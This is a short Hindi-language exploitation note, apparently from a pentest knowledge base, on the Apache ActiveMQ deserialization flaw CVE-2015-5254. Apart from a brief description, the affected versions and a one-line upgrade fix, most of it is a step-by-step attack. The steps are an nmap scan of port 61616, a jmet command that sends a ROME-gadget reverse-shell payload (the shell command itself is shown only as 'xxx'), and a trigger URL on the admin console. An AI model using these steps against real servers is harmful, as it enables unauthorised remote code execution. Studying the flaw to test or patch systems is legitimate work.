
ActiveMQ_CVE-2015-5254
ActiveMQ डिसीरियलाइज़ेशन (CVE-2015-5254)
भेद्यता विवरण: Apache ActiveMQ 5.13.0 से पहले के 5.x संस्करणों में एक सुरक्षा भेद्यता मौजूद है, जो इस कारण से उत्पन्न होती है कि प्रोग्राम ब्रोकर में सीरियलाइज़ किए जा सकने वाले वर्गों को सीमित नहीं करता। दूरस्थ हमलावर विशेष रूप से तैयार सीरियलाइज़्ड Java Message Service (JMS) ObjectMessage ऑब्जेक्ट का उपयोग करके मनमाना कोड निष्पादित कर सकते हैं।
प्रभावित संस्करण: Apache ActiveMQ 5.13.0 से पहले के 5.x संस्करण
0x01 बैकएंड में लॉग इन करें और संस्करण निर्धारित करें: http://IP:8161

0x02 61616 पोर्ट खुला है यह सुनिश्चित करें:
nmap -sV -Pn -T4 -sC -p 61616 IP

0x03 रिवर्स शेल पेलोड भेजें:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "xxx" -Yp ROME IP 61616

0x04 Browse event-Message ID पर क्लिक करके ट्रिगर करें, रिवर्स शेल सफल:
http://IP:8161/admin/message.jsp?id=ID&JMSDestination=event

सुधार सुझाव: नवीनतम संस्करण में अपग्रेड करें, और WAF संबंधित नियमों को इंटरसेप्ट करने के लिए कॉन्फ़िगर करें।